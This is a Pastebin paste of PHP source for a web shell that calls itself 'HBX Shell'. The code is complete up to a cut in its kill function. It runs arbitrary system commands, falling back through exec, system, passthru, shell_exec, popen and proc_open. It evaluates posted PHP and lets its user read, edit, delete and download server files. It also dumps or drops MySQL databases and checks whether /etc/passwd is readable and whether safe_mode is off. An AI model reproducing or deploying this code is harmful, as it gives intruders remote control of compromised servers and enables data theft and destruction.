API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 6th, 2018
97
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.56 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. ob_start();
  3. session_start();
  4. $shell=array("Background"=>"#000000","Primary_Color"=>"#FFFFFF","Border"=>"#3388ff","Font"=>"Arial","Hover"=>"#00FF00",
  5. "Header_Color"=>"#3388ff","Header_Font"=>"verdana","Link_Color"=>"#3388ff","Input_BG"=>"#000000","Input_Color"=>"#3388ff","Input_Border"=>"#bbbbbb", "Textarea_BG"=>"#000000","Textarea_Color"=>"#FFFFFF","Textarea_Border"=>"#3388ff",
  6. "CMD_BG"=>"#000000","CMD_COLOR"=>"#3388ff","CMD_BORDER"=>"#3377dd","CMD_FONT"=>"Arial");
  7. if(isset($_GET['sqldl'])) {mysql_prepare_dump_file(); exit;}
  8. if(isset($_POST['s'])) {
  9. switch($_POST['s']) {
  10. case 'rename':
  11. rename_file($_POST['file'],$_POST['rname']);
  12. break;
  13. case 'chmod':
  14. if(is_dir($_POST['file'])) chmod_dir($_POST['file'],$_POST['mod'],true);
  15. else chmod_file($_POST['file'],$_POST['mod']);
  16. break;
  17. case 'mv':
  18. if(is_dir($_POST['file'])) move_dir($_POST['file'],$_POST['location'],true);
  19. else move_file($_POST['file'],$_POST['location']);
  20. break;
  21. case 'del':
  22. if(is_dir($_POST['file'])) delete_dir($_POST['file'],true);
  23. else delete_file($_POST['file']);
  24. break;
  25. case 'view':
  26. if(!isset($_POST['f'])) list_contents();
  27. else view_file($_POST['f']);
  28. break;
  29. case 'fsave':
  30. write_contents();
  31. break;
  32. case 'sql':
  33. sql_login();
  34. break;
  35. case 'sqlview':
  36. sql_viewer();
  37. break;
  38. case 'insert':
  39. sql_insert();
  40. break;
  41. case 'query':
  42. execute_query(stripslashes($_POST['q']));
  43. break;
  44. case 'logout':
  45. sql_end_session();
  46. break;
  47. case 'create':
  48. sql_create();
  49. break;
  50. case 'drop':
  51. sql_drop();
  52. break;
  53. case 'edit':
  54. sql_edit();
  55. break;
  56. case 'eval':
  57. post_eval();
  58. break;
  59. case 'cmd':
  60. console();
  61. break;
  62. case 'exec':
  63. echo execute_cmd($_POST['cmd']);
  64. break;
  65. case 'kill':
  66. kill_shell();
  67. break;
  68. default:
  69. list_contents();
  70. break;
  71. }
  72. exit;
  73. }
  74. if(isset($_GET['dl']))
  75. {
  76. $fh=fopen($_GET['dl'],'r');
  77. while(!feof($fh)) $file.=stripslashes(fgets($fh));
  78. fclose($fh);
  79. header("Content-type: application/octet-stream");
  80. header("Content-length: ".strlen($file));
  81. header("Content-disposition: attachment; filename=".basename($_GET['dl']).";");
  82. echo $file;
  83. exit;
  84. }
  85. $location=getcwd().'\\'.basename($_SERVER['PHP_SELF']);
  86. $local_addr=$_SERVER['REMOTE_ADDR'];
  87. $local_host=gethostbyaddr($local_addr);
  88. $remote_host=$_SERVER['HTTP_HOST'];
  89. $remote_addr=gethostbyname($remote_host);
  90. $open_basedir=(ini_get("open_basedir")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
  91. $safe_mode=(ini_get("safe_mode")=="")?"<font color='#00FF00'><b>Off</b></font>":"<font color='#FF0000'>On</font>";
  92. $mysql_on=(function_exists("mysql_connect")&&is_callable("mysql_connect"))?"<font color='#00FF00'><b>On</b></font>":"<font color='#FF0000'>Off</font>";
  93. $disabled_functions=(ini_get("disable_functions"))?ini_get("disable_functions"):"<font color='#00FF00'><b>None</b></font>";
  94. $software=$_SERVER['SERVER_SOFTWARE'];
  95. $php_ver=phpversion();
  96. $uname=php_uname();
  97. $curl_on=(function_exists("curl_init")&&is_callable("curl_init"))?"<font color='#00FF00'><b>Enabled</b></font>":"<font color='#FF0000'>Off</font>";
  98. $read_passwd=(file_exists("/etc/passwd")&&is_readable("/etc/passwd"))?"<font color='#00FF00'><b>Yes</b></font>":"<font color='#FF0000'>No</font>";
  99. $disk_free=size(disk_free_space(getcwd()));
  100. $disk_space=size(disk_total_space(getcwd()));
  101. $includes=(@ini_get('allow_url_include')=='')?"<font color='#FF0000'>Disabled</font>":"<font color='#00FF00'><b>Enabled</b></font>";
  102. function execute_cmd($cmd) {
  103. @$_dfunctions=ini_get("disable_functions");
  104. $_dfunctions=str_replace(' ','',$_dfunctions);
  105. $farr=explode(',',$_dfunctions);
  106. $_functions=array("shell_exec","exec","passthru","system","popen","proc_open");
  107. foreach($_functions as $_function)
  108. {
  109. if(!in_array($_function,$farr))
  110. {
  111. if($_function=="exec")
  112. {
  113. @$buf=exec($cmd,$arr);
  114. $ret=join("\n",$buf);
  115. }
  116. elseif($_function=="system")
  117. {
  118. @$ret=system($cmd);
  119. }
  120. elseif($_function=="passthru")
  121. {
  122. @$ret=passthru($cmd);
  123. }
  124. elseif($_function=="shell_exec")
  125. {
  126. @$ret=shell_exec($cmd);
  127. }
  128. elseif($_function=="popen")
  129. {
  130. @$p=popen($cmd,'r');
  131. if(is_resource($p))
  132. {
  133. while(!feof($p)) $ret.=fgets($p);
  134. @pclose($p);
  135. }
  136. }
  137. elseif($_function=="proc_open")
  138. {
  139. $cmdpipe=array(
  140. 0=>array('pipe','r'),
  141. 1=>array('pipe','w')
  142. );
  143. @$proc=proc_open($cmd,$cmdpipe,$pipes);
  144. if(@is_resource($proc))
  145. {
  146. while(@!feof($pipes[1]))
  147. $ret.=@fgets($pipes[1]);
  148. @fclose($pipes[1]);
  149. @proc_close($resource);
  150. }
  151. }
  152. return $ret;
  153. }
  154. }
  155. }
  156. //Begin file functions
  157. //Primary
  158. function list_contents() {
  159. $dirs_array=array(
  160. "Name"=>array(),
  161. "Link"=>array(),
  162. "Size"=>array(),
  163. "Group"=>array(),
  164. "Owner"=>array(),
  165. "Perms"=>array(),
  166. "Modified"=>array()
  167. );
  168.  
  169. $files_array=$dirs_array;
  170. $dir=(isset($_POST['d']))?clean_dir($_POST['d']):clean_dir(getcwd());
  171. if(!@$dh=opendir($dir)) die("Permission denief in $dir!");
  172.  
  173. while((@$file=readdir($dh))) {
  174. if($file=='.') continue;
  175. $full_path=$dir.'/'.$file;
  176. if(is_dir($full_path)) {
  177. $dirs_array['Name'][]=$file;
  178. $dirs_array['Link'][]=$full_path;
  179. $dirs_array['Size'][]="DIR";
  180. $owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
  181. $grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
  182. if(is_array($owner)) $owner=$owner['Name'];
  183. if(is_array($grp)) $grp=$grp['Name'];
  184. $dirs_array['Owner'][]=$owner;
  185. $dirs_array['Group'][]=$grp;
  186. $dirs_array['Perms'][]=get_perms(fileperms($full_path),'d');
  187. $dirs_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
  188. }
  189. else {
  190. $files_array['Name'][]=$file;
  191. $files_array['Link'][]=$full_path;
  192. $files_array['Size'][]=size(filesize($full_path));
  193. $owner=(function_exists("posix_getpwuid")&&is_callable("posix_getpwuid"))?posix_getpwuid(fileowner($full_path)):fileowner($full_path);
  194. $grp=(function_exists("posix_getgrgid")&&is_callable("posix_getgrgid"))?posix_getgrgid(filegroup($full_path)):filegroup($full_path);
  195. if(is_array($owner)) $owner=$owner['name'];
  196. if(is_array($grp)) $grp=$grp['name'];
  197. $files_array['Owner'][]=$owner;
  198. $files_array['Group'][]=$grp;
  199. $files_array['Perms'][]=get_perms(fileperms($full_path),'f');
  200. $files_array['Modified'][]=date("d/m/Y H:i:s",filemtime($full_path));
  201. }
  202. }
  203. @closedir($dh);
  204. asort($dirs_array);
  205. asort($files_array);
  206.  
  207. echo "
  208. <div class='info'>
  209. <table><tr><td><font color='#FF00FF'>[ Executable ]</font></td><td><font color='#0000FF'>[ Writable ]</font></td>
  210. <td><font color='#FF0000'>[ Config ]</font></td><td><font color='#00FF00'>[ DIR ]</font></td></tr></table><center>Viewing directory: ";
  211. $arr=explode('/',$dir);
  212. foreach($arr as $piece) {
  213. $path.="$piece/";
  214. echo "<a href='#' onClick=\"sendRequest('view&d=$path')\">$piece/</a>";
  215. }
  216. echo "</center></div><br />
  217. <table style='width: 100%'>
  218. <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Modified</td><td>Actions</td></tr>";
  219.  
  220. for($d=0;$d<count($dirs_array['Name']);$d++) {
  221. $nm=$dirs_array['Name'][$d];
  222. if($nm=="..") $link=dir_lower(clean_dir($dirs_array['Link'][$d]));
  223. else $link=$dirs_array['Link'][$d];
  224. echo "<tr><td><a href='#' onClick=\"sendRequest('view&d=$link')\"><font color='#00FF00'>[$nm]</font></a></td><td>".$dirs_array['Size'][$d]."</td><td>"
  225. .$dirs_array['Owner'][$d].'/'.$dirs_array['Group'][$d]."</td><td>".$dirs_array['Perms'][$d]."</td><td>"
  226. .$dirs_array['Modified'][$d]."</td><td><a href='#' onClick=\"loadInput('chmod','".$dirs_array['Link'][$d]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('move','".$dirs_array['Link'][$d]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$dirs_array['Link'][$d]."')\">[ Delete ]</a></td><td><input type='checkbox'></td></tr>";
  227. }
  228. for($i=0;$i<count($files_array['Name']);$i++) {
  229. if(is_executable($files_array['Link'][$i])) $color='#FF00FF';
  230. else if(eregi("config",$files_array['Link'][$i])) $color='#FF0000';
  231. else if(strrchr($files_array['Name'][$i],'.')=="sql" || strrchr($files_array['Name'][$i],'.')=="db") $color='#00FF00';
  232. else if(is_writable($files_array['Link'][$i])) $color='#0000FF';
  233. else $color="#FFFFFF";
  234. $nm=$files_array['Name'][$i];
  235. echo "<tr style='color: $color;'><td>
  236. <a href='#' onClick=\"sendRequest('view&f=".$files_array['Link'][$i]."')\"><font color='$color'>$nm</a></font></td><td>"
  237. .$files_array['Size'][$i]."</td><td>".$files_array['Owner'][$i].'/'.$files_array['Group'][$i]."</td><td>".$files_array['Perms'][$i]."</td><td>"
  238. .$files_array['Modified'][$i]."</td><td><a href='#' onClick=\"loadInput('chmod','".$files_array['Link'][$i]."')\">[ Chmod ]</a> <a href='#' onClick=\"loadInput('rename','".$files_array['Link'][$i]."')\">[ Rename ]</a> <a href='#' onClick=\"loadInput('move','".$files_array['Link'][$i]."')\">[ Move ]</a> <a href='#' onClick=\"sendRequest('del&file=".$files_array['Link'][$i]."')\"> [ Delete ] </a><a href='?dl=".$files_array['Link'][$i]."' target='_blank'>[ Download ]</a></td><td><input type='checkbox'></td></tr>";
  239. }
  240. echo "</table>";
  241. }
  242.  
  243. function view_file($file) {
  244. $fh=fopen($file,'r');
  245. if(is_resource($fh)) {
  246. while(!feof($fh)) $fcontents.=htmlspecialchars(fgets($fh));
  247. fclose($fh);
  248. echo "<center><a href='#' onClick=\"sendRequest('fsave&f=$file','save')\">[ Save ]</a></center>
  249. <textarea id='file' rows='20' style='width: 100%'>$fcontents</textarea>";
  250. } else {echo "Failed to open file $file for reading!<br /><br />"; list_contents();}
  251. }
  252.  
  253. function create_file($file) {
  254. @$fh=fopen($file,'w');
  255. @fclose($fh);
  256. }
  257.  
  258. function write_contents() {
  259. if(is_resource($fh=fopen($_POST['f'],'w'))) {
  260. fwrite($fh,stripslashes($_POST['data']),strlen($_POST['data']));
  261. fclose($fh);
  262. echo "File $_POST[f] saved successfully!<br /><br />";
  263. } else {echo "Failed to write to file $_POST[f]!<br /><br />";}
  264. list_contents();
  265. }
  266. //Secondary
  267.  
  268. function get_perms($mode,$type) { #Update for *nix perms later.
  269. if($type=='d') $mode=substr(base_convert($mode,10,8),2);
  270. else $mode=substr(base_convert($mode,10,8),3);
  271. return $mode;
  272. }
  273.  
  274. function chmod_file($file,$perms) {
  275. if(chmod($file,$perms)) echo "Managed to chmod file $file successfully.<br /><br />";
  276. else echo "Failed to chmod file $file.<br /><br />";
  277. list_contents();
  278. }
  279.  
  280. function rename_file($old,$new) {
  281. $arr=explode('/',$old);
  282. array_pop($arr);
  283. foreach($arr as $piece) $rname.="$piece/";
  284. $rname.=$new;
  285. if(rename($old,$rname)) echo "Managed to rename file $file successfully.<br /><br />";
  286. else echo "Failed to rename file $file.<br /><br />";
  287. list_contents();
  288. }
  289.  
  290. function move_file($old,$new) {
  291. $fh=fopen($old,'r');
  292. $fh2=fopen($new,'w');
  293. if(is_resource($fh2)&&is_resource($fh)) {
  294. while(!feof($fh)) $out_contents.=fgets($fh);
  295. fwrite($fh2,$out_contents,strlen($out_contents));
  296. fclose($fh);
  297. fclose($fh2);
  298. echo "Moved file $old to $new successfully.<br /><br />";
  299. } else {echo "Failed to move file $old to $new<br /><br />";}
  300. list_contents();
  301. }
  302.  
  303. function delete_file($file) {
  304. if(unlink($file)) echo "Managed to delete file $file successfully.<br /><br />";
  305. else echo "Failed to delete file $file.<br /><br />";
  306. list_contents();
  307. }
  308.  
  309. //Repetitive file functions
  310. function chmod_dir($dir,$perms,$call=false,$success=0,$files=0) {
  311. $files=$success=0;
  312. if(is_resource($dh=opendir($dir))) {
  313. while(($file=readdir($dh))) {
  314. if($file==".."||$file==".") continue;
  315. $files++;
  316. if(is_dir($dir.'/'.$file)) {
  317. chmod_dir($dir.'/'.$file,$perms,false,$success,$files);
  318. continue;
  319. }
  320. if(chmod($dir.'/'.$file,$perms)) {$success++; echo "CHMOD $file to $perms<br />";}
  321. }
  322. closedir($dh);
  323. if($call) echo "Changed perms for $success files out of $files files.<br /><br />";
  324. } else {echo "Failed to open dir $dir<br /><br />";}
  325. if($call) list_contents();
  326. }
  327.  
  328. function move_dir($dir,$loc,$call=false) {
  329. if(is_resource($dh=opendir($dir))) {
  330. if(!is_dir($loc)) {
  331. if(!mkdir($loc)) die("Failed to create new location!");
  332. if(is_resource($dh2=opendir($loc))) {
  333. while(($file=readdir($dh))) {
  334. if($file=='.'||$file=='..') continue;
  335. if(is_dir($dir.'/'.$file)) {
  336. move_dir($dir.'/'.$file.'/',$loc.'/'.$file);
  337. continue;
  338. }
  339. create_file($loc.'/'.$file);
  340. $cur=fopen($dir.'/'.$file,'r');
  341. while(!feof($cur)) $contents.=fgets($cur);
  342. fclose($cur);
  343. $cur=fopen($loc.'/'.$file,'w');
  344. fwrite($cur,$contents,strlen($contents));
  345. fclose($cur);
  346. }
  347. } else {echo "Failed to [M] open dir $loc!";}
  348. } else {echo "Failed to open dir $dir!<br /><br />";}
  349. }
  350. if($call) list_contents();
  351. }
  352.  
  353. function delete_dir($dir,$call=false,$success=0,$files=0) {
  354. if(is_resource($dh=opendir($dir))) {
  355. $files=$success=0;
  356. while(($file=readdir($dh))) {
  357. if($file==".."||$file==".") continue;
  358. $files++;
  359. if(is_dir($dir.'/'.$file)) {
  360. delete_dir($dir.'/'.$file,false,$success,$files);
  361. continue;
  362. }
  363. if(unlink($dir.'/'.$file)) {$success++; echo "Deleted $file...<br />";}
  364. }
  365. closedir($dh);
  366. if($call) echo "Deleted $success files out of $files files.<br /><br />";
  367. } else {echo "Failed to open dir $dir.<br /><br />";}
  368. if($call) list_contents();
  369. }
  370. //End
  371.  
  372. function clean_dir($d) {
  373. $d=str_replace("\\","/",$d);
  374. $d=str_replace("//","/",$d);
  375. return $d;
  376. }
  377.  
  378. function dir_lower($d) {
  379. $dir=explode("/",$d);
  380. array_pop($dir);
  381. array_pop($dir);
  382. foreach($dir as $chunks) $lower.="$chunks/";
  383. return $lower;
  384. }
  385.  
  386. function size($s) {
  387. if(!$s) return "0 B";
  388. if($s>=1073741824) return(round($s/1073741824)." GB");
  389. elseif($s>=1048576) return(round($s/1048576)." MB");
  390. elseif($s>=1024) return(round($s/1024)." KB");
  391. else return($s.=" B");
  392. }
  393. //End file functions
  394. //Begin SQL functions
  395. function sql_login() {
  396. if(isset($_SESSION['user'])) {mysql_view_dbs();}
  397. else if(!isset($_POST['host'])) {
  398. echo "<center>
  399. Host:Port: <input type='text' id='sql_host' value='localhost:3306'><br />
  400. Username: <input type='text' id='sql_user' value='root'><br />
  401. Password: <input type='password' id='sql_pass'><br /><br />
  402. <a href='#' onClick=\"sendRequest('sql','sqllogin')\">[ Login ]</a>
  403. </center>";
  404. } else {
  405. echo "<center>";
  406. if(@$conn=mysql_connect($_POST['host'],$_POST['user'],$_POST['pass'])) {
  407. echo "<font color='#00FF00'><b>Access granted</b></font></center>";
  408. $_SESSION['host']=$_POST['host'];
  409. $_SESSION['user']=$_POST['user'];
  410. $_SESSION['pass']=$_POST['pass'];
  411. mysql_view_dbs();
  412. } else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
  413. }
  414. }
  415.  
  416. function mysql_view_dbs() {
  417. extract($_SESSION);
  418. echo "<center><br /><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table>";
  419. if(@$conn=mysql_connect($host,$user,$pass)) {
  420. echo "<tr><td>Database</td><td>Tables</td></tr>";
  421. $dbs=mysql_list_dbs();
  422. while($db=mysql_fetch_array($dbs))
  423. {
  424. $cur=mysql_query("SHOW TABLES FROM $db[Database]");
  425. $count=mysql_num_rows($cur);
  426. echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$db[Database]')\">$db[Database]</a></td><td>$count</td><td><a href='?sqldl=1&db=$db[Database]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$db[Database]')\">[ Drop ]</a></td></tr>";
  427. }
  428. } else {echo"<font color='#FF0000'><b>Access denied: Failed to connect to $_POST[user]@$_POST[host]</b></font></center>";}
  429. echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Create Database ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' value='New_Database' onKeyDown=\"checkKey(event,'create')\"></div><br /><br />Execute query<br /><br /><input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
  430. }
  431.  
  432. function sql_viewer() {
  433. extract($_SESSION);
  434. echo "<center><br />Currently logged in as $user@$host <a href='#' onClick=\"sendRequest('logout')\">[ Logout ]</a><br /><br /><table style='text-align: center;'>";
  435. if(@$conn=mysql_connect($host,$user,$pass)) {
  436. if(!isset($_POST['tbl'])) {
  437. echo "<tr><td>Table</td><td>Columns</td></tr>";
  438. $query=mysql_query("SHOW TABLES FROM $_POST[db]");
  439. while($tbl=mysql_fetch_array($query)) {
  440. $cols=mysql_query("SHOW COLUMNS FROM $_POST[db].$tbl[0]");
  441. $count=mysql_num_rows($cols);
  442. echo "<tr><td><a href='#' onClick=\"sendRequest('sqlview&db=$_POST[db]&tbl=$tbl[0]')\">$tbl[0]</a></td><td>$count</td><td><a href='?sqldl=1&db=$_POST[db]&tbl=$tbl[0]' target='_blank'>[ Download ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$tbl[0]')\">[ Drop ]</a></td></tr>";
  443. }
  444. echo "</table><br /><a href='#' onClick=\"show('sql')\">[ Insert table ]</a><br /><br /><div id='sql' style='display: none'>Database: <input type='text' id='new_database' style='width: 20%' value='new_table' onKeyDown=\"checkKey(event,'createtbl')\"><input type='hidden' id='sql_db' value='$_POST[db]'></div><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
  445. } elseif(isset($_POST['tbl'])) {
  446. $columns=array();
  447. $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
  448. while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
  449. echo "<tr>";
  450. for($t=0;$t<count($columns);$t++) echo "<td>$columns[$t]</td>";
  451. echo "<td>Row actions</td></tr>";
  452. $query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl]");
  453. while($row=mysql_fetch_array($query)) {
  454. echo "<tr>";
  455. for($i=0;$i<count($columns);$i++)
  456. echo "<td>$row[$i]</td>";
  457. echo "<td><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v='+encodeURIComponent('$row[0]')+'')\">[ Edit Row ]</a> <a href='#' onClick=\"sendRequest('drop&db=$_POST[db]&tbl=$_POST[tbl]&row=$columns[0]&v=$row[0]')\">[ Remove row ]</a></td>";
  458. echo "</tr>";
  459. }
  460. echo "</table><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]')\">[ Insert row ]</a><br /><br />Execute query<input type='text' id='sql_out' style='display: none; width: 100%;'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'sql_query')\" id='sql_in' value='SELECT * FROM information_schema.tables'></center>";
  461. }
  462. }
  463. }
  464.  
  465. function mysql_prepare_dump_file()
  466. {
  467. echo "<h2>Preparing to dump SQL data...<br />";
  468. extract($_SESSION);
  469. if(@$conn=mysql_connect($host,$user,$pass)) {
  470. echo "Logged on to SQL server...good.<br />";
  471. $dump_file="#######################SQL Data dumped by HBX Shell (version 1.0)#######################\r\n";
  472. $dump_name=isset($_GET['tbl'])?$_GET['db'].'_'.$_GET['tbl'].'.sql':$_GET['db'].'.sql';
  473. if(isset($_GET['tbl'])) {
  474. echo "Dumping data from table $_GET[tbl]...<br />";
  475. mysql_select_db($_GET['db']);
  476. $columns=array();
  477. $query=mysql_query("SHOW COLUMNS FROM $_GET[tbl]");
  478. while($col=mysql_fetch_array($query)) $columns[]=$col['Field'];
  479. $query=mysql_query("SELECT * FROM $_GET[tbl]");
  480. while($row=mysql_fetch_array($query)) {
  481. $dump_file.="INSERT INTO `$_GET[tbl]` (";
  482. for($i=0;$i<count($columns);$i++) {
  483. if($i==count($columns)-1)
  484. $dump_file.="`$columns[$i]`)\r\n";
  485. else
  486. $dump_file.="`$columns[$i]`,";
  487. }
  488. $dump_file.="VALUES ( ";
  489. for($j=0;$j<count($row);$j++) {
  490. if($j==count($row)-1)
  491. $dump_file.="`$row[$j]`)\r\n";
  492. else
  493. $dump_file.="`$row[$j]`,";
  494. }
  495. }
  496. }
  497. else {
  498. echo "Dumping data from database $_GET[db]...<br />";
  499. $tables=array();
  500. $columns=array();
  501. $query=mysql_query("SHOW TABLES FROM $_GET[db]");
  502. while($tbl=mysql_fetch_array($query)) $tables[]=$tbl[0];
  503. foreach($tables as $current_table) {
  504. $current_cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$current_table");
  505. while($col=mysql_fetch_array($current_cols)) $columns[]=$col['Field'];
  506. $query=mysql_query("SELECT * FROM $_GET[db].$current_table");
  507. while($row=mysql_fetch_array($query)) {
  508. $dump_file.="INSERT INTO `$current_table` (";
  509. for($i=0;$i<count($columns);$i++) {
  510. if($i==count($columns)-1)
  511. $dump_file.="`$columns[$i]`) \r\n";
  512. else
  513. $dump_file.="`$columns[$i]`,";
  514. }
  515. $dump_file.="VALUES ( ";
  516. for($j=0;$j<count($row);$j++) {
  517. if($j==count($row)-1)
  518. $dump_file.="`$row[$j]`)\r\n";
  519. else
  520. $dump_file.="`$row[$j]`,";
  521. }
  522. }
  523. $columns=array(); #Reset this badboy
  524. }
  525. }
  526. $dump_file.="END OF SQL DUMP\r\n";
  527. $dump_file.="########################################################################################";
  528. ob_get_clean();
  529. header("Content-type: application/octet-stream");
  530. header("Content-length: ".strlen($dump_file));
  531. header("Content-disposition: attachment; filename=$dump_name;");
  532. echo $dump_file;
  533. exit;
  534. }
  535. else echo "Failed to login! Cannot dump SQL.";
  536. echo "</h2>";
  537. }
  538.  
  539. function sql_drop() {
  540. extract($_SESSION);
  541. if(@$conn=mysql_connect($host,$user,$pass)) {
  542. if(!isset($_POST['tbl'])) {
  543. mysql_query("DROP DATABASE $_POST[db]") or die(mysql_error());
  544. echo "<center><font color='#00FF00'>Dropped database $_POST[db] successfully.</font><br /></center>";
  545. mysql_view_dbs();
  546. } elseif(isset($_POST['tbl'])&&!isset($_POST['row'])) {
  547. mysql_query("DELETE FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
  548. echo "<center><font color='#00FF00'>Dropped table $_POST[tbl] successfully.</font><br /></center>";
  549. mysql_view_dbs();
  550. } else {
  551. mysql_query("DELETE FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
  552. echo "<center><font color='#00FF00'>Deleted row successfully.</font><br /></center>";
  553. mysql_view_dbs();
  554. }
  555. }
  556. }
  557. function sql_create() {
  558. extract($_SESSION);
  559. if(@$conn=mysql_connect($host,$user,$pass)) {
  560. if(!isset($_POST['tbl'])) {
  561. mysql_query("CREATE DATABASE $_POST[db]") or die(mysql_error());
  562. echo "<center><font color='#00FF00'>Created database $_POST[db] successfully.</font><br /></center>";
  563. mysql_view_dbs();
  564. } else {
  565. mysql_query("CREATE TABLE $_POST[db].$_POST[tbl] (`TEMPORARY` TEXT NOT NULL)") or die(mysql_error());
  566. echo "<center><font color='#00FF00'>Created table $_POST[db].$_POST[tbl] successfully.</font><br /></center>";
  567. mysql_view_dbs();
  568. }
  569. }
  570. }
  571. function sql_insert() {
  572. echo "<center><form id='vals'>";
  573. extract($_SESSION);
  574. if(@$conn=mysql_connect($host,$user,$pass)) {
  575. $cols=array();
  576. $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
  577. while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
  578. if(!isset($_POST['update'])) {
  579. for($i=0;$i<count($cols);$i++) {
  580. echo "<input type='hidden' value='$cols[$i]'>
  581. $cols[$i]: <input type='text'><br />";
  582. }
  583. echo "</form><br /><a href='#' onClick=\"sendRequest('insert&db=$_POST[db]&tbl=$_POST[tbl]','insert')\">[ Insert ]</a>";
  584. } else {
  585. $fields=array();
  586. $rows=array();
  587. foreach($_POST as $key=>$value) {
  588. if(in_array($key,$cols)) {
  589. $fields[]="'".$value."'";
  590. $rows[]="`".$key."`";
  591. }
  592. }
  593. $vals=implode(",",$fields);
  594. $keys=implode(",",$rows);
  595. mysql_query("INSERT INTO $_POST[db].$_POST[tbl] ($keys) VALUES ($vals)") or die(mysql_error());
  596. echo "Inserted row successfully.";
  597. }
  598. }
  599. echo "</center>";
  600. mysql_view_dbs();
  601. }
  602. function sql_edit() {
  603. $cols=array();
  604. echo "<center>";
  605. extract($_SESSION);
  606. if(@$conn=mysql_connect($host,$user,$pass)) {
  607. if($_POST['update']!=1) {
  608. $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]") or die(mysql_error());
  609. while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
  610. $query=mysql_query("SELECT * FROM $_POST[db].$_POST[tbl] WHERE $_POST[row]='$_POST[v]'") or die(mysql_error());
  611. if(mysql_num_rows($query)>0) {
  612. echo "<form id='sqlvals'>";
  613. while($row=mysql_fetch_array($query)) {
  614. for($i=0;$i<count($cols);$i++)
  615. echo "<input type='hidden' value='$cols[$i]'>$cols[$i]: <input type='text' value='$row[$i]'><br />";
  616. }
  617. echo "</form><a href='#' onClick=\"sendRequest('edit&db=$_POST[db]&tbl=$_POST[tbl]&row='+encodeURIComponent('$_POST[row]')+'&v='+encodeURIComponent('$_POST[v]')+'','sqlsave')\">[ Save ]</a>";
  618. } else {echo "MySQL returned 0 results.";}
  619. } else {
  620. $vals=array();
  621. $keys=array();
  622. $query=mysql_query("SHOW COLUMNS FROM $_POST[db].$_POST[tbl]");
  623. while($col=mysql_fetch_array($query)) $cols[]=$col['Field'];
  624. $update="UPDATE $_POST[db].$_POST[tbl]";
  625. foreach($_POST as $k=>$v) {
  626. if(in_array($k,$cols)) {
  627. $vals[]=$v;
  628. $keys[]=$k;
  629. }
  630. }
  631. for($j=0;$j<count($vals);$j++) {
  632. if($j==count($vals)-1) {$update.=" SET `$keys[$j]`='$vals[$j]' WHERE $_POST[row]='$_POST[v]'"; break;}
  633. $update.=" SET `$keys[$j]`='$vals[$j]',";
  634. }
  635. echo $update."<br />";
  636. mysql_query($update) or die(mysql_error());
  637. echo "Updated row successfully!<br />";
  638. }
  639. } else {echo "<font color='red'>Warning: Failed to connect to SQL server</font>";}
  640. echo"</center>";
  641. mysql_view_dbs();
  642. }
  643. function sql_end_session() {
  644. $_SESSION=array();
  645. session_destroy();
  646. echo "<center><font color='#00FF00'>Logged out from SQL</font></center><br />";
  647. sql_login();
  648. }
  649.  
  650. function execute_query($query) {
  651. extract($_SESSION);
  652. if(@$conn=mysql_connect($host,$user,$pass)) {
  653. mysql_query($query) or die(mysql_error());
  654. $affected=mysql_affected_rows();
  655. echo "Query executed. Affected rows: $affected";
  656. }
  657. }
  658. //End SQL functions
  659.  
  660. function find_exploits() {
  661. $exploits=array("File inclusion"=>"/(include|include_once|require|require_once)\(\\$_[GP].*{2,3}\[/");
  662. }
  663. function post_eval() {
  664. if(isset($_POST['e'])) {
  665. echo eval(stripslashes($_POST['e']));
  666. } else {
  667. echo "<textarea id='eval_out' style='width: 100%; display: none;' rows='10'>//Don't include PHP tags</textarea><br /><textarea id='eval' style='width: 100%' rows='10'>//Don't include PHP tags</textarea><br /><center><a href='#' onClick=\"sendRequest('eval','eval')\">[ Eval ]</a>";
  668. }
  669. }
  670. function console() {
  671. echo "<div id='cmd'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'exec')\"id='cmd_in'><br /><textarea id='cmd_out' style='width: 100%;' rows='20'></textarea></div>";
  672. }
  673. function kill_shell() {
  674. if(!isset($_POST['dokill'])) {
